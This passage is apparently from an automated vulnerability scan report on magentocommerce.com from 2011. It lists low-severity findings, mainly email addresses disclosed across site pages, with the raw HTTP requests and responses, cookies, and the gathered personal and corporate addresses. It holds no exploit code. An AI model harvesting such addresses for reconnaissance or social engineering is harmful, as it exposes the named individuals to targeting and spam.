Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</div>


<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAwGKCtwyzC-sOvkN3PJc3VBRhfGNd6uzv7tP9uchyvkujo9szKhR62DiJLsb_AjncGY1KBQjTwFa-jg" type="text/javascript"></script>
...[SNIP]...
7.8. http://www.magentocommerce.com/services/contact-us-popup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/contact-us-popup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/contact-us-popup HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175780; expires=Sat, 11-Aug-2012 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fcontact-us-popup%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:00 GMT
Content-Length: 3090

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
</div>

<script type="text/javascript" src="http://info.magento.com/js/mktFormSupport.js"></script>
...[SNIP]...
8. Email addresses disclosed  previous  next
There are 26 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

8.1. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The following email address was disclosed in the response:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991/">maciej@deligo.pl</a>
...[SNIP]...
8.2. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The following email address was disclosed in the response:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
>Our current opportunities are listed below, but be sure to check back regularly as new opportunities are added all the time. Don...t see a role that fits your background? No worries, send a resume to jobs@magento.com with the type of work you...re interested in and we...ll keep you in mind for future opportunities.</p>
...[SNIP]...
8.3. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank"><u>jobs@magento.com</u>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@Magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@Magento.com">jobs@Magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
<a href="mailto:jobs@magento.com" target="_blank">
...[SNIP]...
<a href="mailto:jobs@magento.com">jobs@magento.com</a>
...[SNIP]...
8.4. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The following email address was disclosed in the response:

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="mailto:info@magentocommerce.com">info@magentocommerce.com</a>
...[SNIP]...
8.5. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The following email address was disclosed in the response:

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="mailto:info@magentocommerce.com">info@magentocommerce.com</a>
...[SNIP]...
8.6. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="mailto:privacy@magentocommerce.com?subject=BLOCK">privacy@magentocommerce.com</a>
...[SNIP]...
<a href="mailto:privacy@magentocommerce.com">privacy@magentocommerce.com</a>
...[SNIP]...
<a href="mailto:privacy@magentocommerce.com">privacy@magentocommerce.com</a>
...[SNIP]...
<a href="mailto:privacy@magentocommerce.com">privacy@magentocommerce.com</a>
...[SNIP]...
<a href="mailto:safeharbor@the-dma.org">safeharbor@the-dma.org</a>
...[SNIP]...
<a href="mailto:privacy@magentocommerce.com">privacy@magentocommerce.com</a>
...[SNIP]...
8.7. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The following email address was disclosed in the response:

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.8. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The following email address was disclosed in the response:

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.9. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="mailto:contact@bargento.fr"><a href="mailto:contact@bargento.fr">contact@bargento.fr</a>
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.10. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The following email address was disclosed in the response:

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/90991">maciej@deligo.pl</a>
...[SNIP]...
8.11. http://www.magentocommerce.com/js/rating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /js/rating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/rating.js HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:42:05 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:53:26 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 13:42:05 GMT
Cache-Control: max-age=604800
Content-Length: 3637

/*
Page: rating.js
Created: Aug 2006
Last Mod: Mar 11 2007
Handles actions and requests for rating bars.    
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
----------------------------------------------------
...[SNIP]...
8.12. http://www.magentocommerce.com/js/tracklinks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /js/tracklinks.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/tracklinks.js HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:47 GMT
Content-Type: application/x-javascript
Content-Length: 3755
Last-Modified: Mon, 21 Feb 2011 10:53:26 GMT
Connection: close
Expires: Fri, 19 Aug 2011 15:16:47 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

//    Javascript to tag file downloads and external links in Google Analytics
//    To use, place reference to this file should be placed at the bottom of all pages,
//    just above the Google Analytics tracking code.
//    All outbound links and links to non-html files should now be automatically tracked.
//
// +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//    Created by:    Colm McBarron, colm.mcbarron@iqcontent.com
//    Last updated:    12-Feb-2006
//
//    Updated by:        Niamh Phelan niamh.phelan@iqcontent.com
//    On:                22-Jul-2008
//    For:            Upgrade to ga.js    
//
//    Updated by:        Peter McKenna peter.mckenna@iqcontent.com
//    On:                07-Nov-2008
//    For:            Track mailto: links and restructure how virtual
//        pageviews are structured
//
//    Updated by:        Peter McKenna peter.mckenna@iqcontent.com
//    On:                19-Feb-2009
//    For:            Fixed up some problems with how Internet
//                    Explorer 6 was tracking links, and some minor
//                    Firefox issues.
//    +++++++++++++++++++++++++++++++++++++++++++++++
...[SNIP]...
8.13. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The following email address was disclosed in the response:

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
